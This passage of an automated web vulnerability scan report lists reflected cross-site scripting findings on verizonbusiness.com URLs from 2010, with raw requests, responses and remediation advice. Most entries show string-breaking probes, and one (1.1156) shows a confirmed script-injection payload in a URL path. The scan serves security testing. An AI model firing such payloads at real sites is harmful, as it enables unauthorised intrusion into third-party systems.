Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:02:07 GMT
Content-Type: text/html
Content-Length: 40260
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:02:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:02:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/mediadba5c';dfc24057dbd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1147. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fb44"%3bb0fafe33ee7 was submitted in the REST URL parameter 3. This input was echoed as 5fb44";b0fafe33ee7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media5fb44"%3bb0fafe33ee7/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40260
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media5fb44";b0fafe33ee7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1148. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ce8e"%3bc126e288bfe was submitted in the REST URL parameter 4. This input was echoed as 6ce8e";c126e288bfe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/index.xml6ce8e"%3bc126e288bfe?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:02:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 38203
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:02:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:02:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
x.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media/index.xml6ce8e";c126e288bfe";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1149. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d961'%3be3115deb0d2 was submitted in the REST URL parameter 4. This input was echoed as 9d961';e3115deb0d2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/index.xml9d961'%3be3115deb0d2?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:02:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 38203
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:02:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:02:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/media/index.xml9d961';e3115deb0d2'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1150. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49945'%3b21ef45edbfb was submitted in the REST URL parameter 1. This input was echoed as 49945';21ef45edbfb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide49945'%3b21ef45edbfb/resources/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide49945';21ef45edbfb/resources/media/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1151. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8d7e"%3bde47903cbee was submitted in the REST URL parameter 1. This input was echoed as f8d7e";de47903cbee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwidef8d7e"%3bde47903cbee/resources/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwidef8d7e";de47903cbee/resources/media/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

1.1152. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b1ba'%3b3713fda6903 was submitted in the REST URL parameter 2. This input was echoed as 3b1ba';3713fda6903 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources3b1ba'%3b3713fda6903/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:12 GMT
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources3b1ba';3713fda6903/media/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1153. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 723f8"%3b016e42dcbe8 was submitted in the REST URL parameter 2. This input was echoed as 723f8";016e42dcbe8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources723f8"%3b016e42dcbe8/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources723f8";016e42dcbe8/media/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.1154. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ee6a"%3b4f7bbbfbc2f was submitted in the REST URL parameter 3. This input was echoed as 9ee6a";4f7bbbfbc2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media9ee6a"%3b4f7bbbfbc2f/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40288
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media9ee6a";4f7bbbfbc2f/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1155. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b659'%3b24c0a7e6852 was submitted in the REST URL parameter 3. This input was echoed as 1b659';24c0a7e6852 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media1b659'%3b24c0a7e6852/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:32 GMT
Content-Type: text/html
Content-Length: 40290
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/media1b659';24c0a7e6852/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1156. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bdd8</script><script>alert(1)</script>c483f84a204 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/large-131421-mitsui.xml1bdd8</script><script>alert(1)</script>c483f84a204 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "3de5a50ebb7bd8689e48ef1c4fb9e769"
Last-Modified: Wed, 17 Nov 2010 01:01:54 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 01:01:54 GMT
Content-Length: 17296
Connection: close
Set-Cookie: BERT=VRID%3df6699c20-efb6-4dec-adb9-8a09175bd672|VTID%3d9508545a-43b4-454c-b863-50f5d9690146|SX%3d1289956913|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:05:37 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:01:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/worldwide/resources/media/large-131421-mitsui.xml1bdd8</script><script>alert(1)</script>c483f84a204</url>
...[SNIP]...

1.1157. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75f0b'%3bddf7503804e was submitted in the REST URL parameter 1. This input was echoed as 75f0b';ddf7503804e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide75f0b'%3bddf7503804e/resources/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide75f0b';ddf7503804e/resources/media/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1158. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63cb4"%3bebba4ad3ff9 was submitted in the REST URL parameter 1. This input was echoed as 63cb4";ebba4ad3ff9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide63cb4"%3bebba4ad3ff9/resources/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:58 GMT
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide63cb4";ebba4ad3ff9/resources/media/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

